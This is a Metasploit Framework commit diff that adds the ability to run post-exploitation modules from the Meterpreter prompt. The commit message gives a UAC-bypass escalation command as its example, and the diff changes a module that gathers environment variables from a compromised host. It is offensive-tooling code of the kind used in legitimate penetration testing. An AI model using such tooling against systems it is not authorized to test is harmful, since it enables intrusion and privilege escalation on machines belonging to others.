add support for running post modules from the meterpreter prompt. options are set in the same way as the -o arg to run, e.g. run post/escalate/bypassuac LHOST=192.168.0.1

git-svn-id: file:///home/svn/framework3/trunk@11496 4d416f70-5f16-0410-b530-b9f4589650da
2011-01-06 21:28:00 +00:00 · 2011-01-06 21:28:00 +00:00 · dbeae8df24
parent aafb30ba8c
commit dbeae8df24
3 changed files with 25 additions and 17 deletions
--- a/lib/msf/core/post.rb
+++ b/lib/msf/core/post.rb
@ -21,6 +21,10 @@ class Post < Msf::Module
 		] , Msf::Post)
 	end

+	#
+	# Grabs a session object from the framework or raises OptionValidateError
+	# if one doesn't exist.
+	#
 	def setup
 		@sysinfo = nil
 		@session = framework.sessions[datastore["SESSION"].to_i]
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb
@ -344,8 +344,23 @@ class Console::CommandDispatcher::Core

 		# Get the script name
 		begin
-			# the rest of the arguments get passed in through the binding
-			client.execute_script(args.shift, args)
+			script_name = args.shift
+			# First try it as a Post module if we have access to the Metasploit
+			# Framework instance.  If we don't, or if no such module exists,
+			# fall back to using the scripting interface.
+			if (client.framework and mod = client.framework.modules.create(script_name))
+				opts = (args + [ "SESSION=#{client.sid}" ]).join(',')
+				print_status opts.inspect
+				mod.run_simple(
+					#'RunAsJob' => true,
+					'LocalInput'  => shell.input,
+					'LocalOutput' => shell.output,
+					'OptionStr'   => opts
+				)
+			else
+				# the rest of the arguments get passed in through the binding
+				client.execute_script(script_name, args)
+			end
 		rescue
 			print_error("Error in script: #{$!.class} #{$!}")
 			elog("Error in script: #{$!.class} #{$!}")
--- a/modules/post/gather/env.rb
+++ b/modules/post/gather/env.rb
@ -14,6 +14,8 @@ require 'rex'

 class Metasploit3 < Msf::Post

+	include Post::Registry
+
 	def initialize(info={})
 		super( update_info( info,
 			'Name'          => 'Get environment',
@ -61,25 +63,12 @@ class Metasploit3 < Msf::Post
 				print_line "#{v}=#{session.fs.file.expand_path("\%#{v}\%")}"
 			end
 		else
+			# Don't know what it is, hope it's unix
 			print_status sysinfo["OS"]
-			chan = session.sys.process.execute("/bin/sh -c env", nil, {"Channelized" => true})
+			chan = session.sys.process.execute("/bin/sh", "-c env", {"Channelized" => true})
 			print_line chan.read
 		end
 	end

-	def registry_enumvals(key)
-		values = []
-		begin
-			vals = {}
-			root_key, base_key = session.sys.registry.splitkey(key)
-			open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ)
-			vals = open_key.enum_value
-			vals.each { |val|
-				values <<  val.name
-			}
-			open_key.close
-		end
-		return values
-	end
 end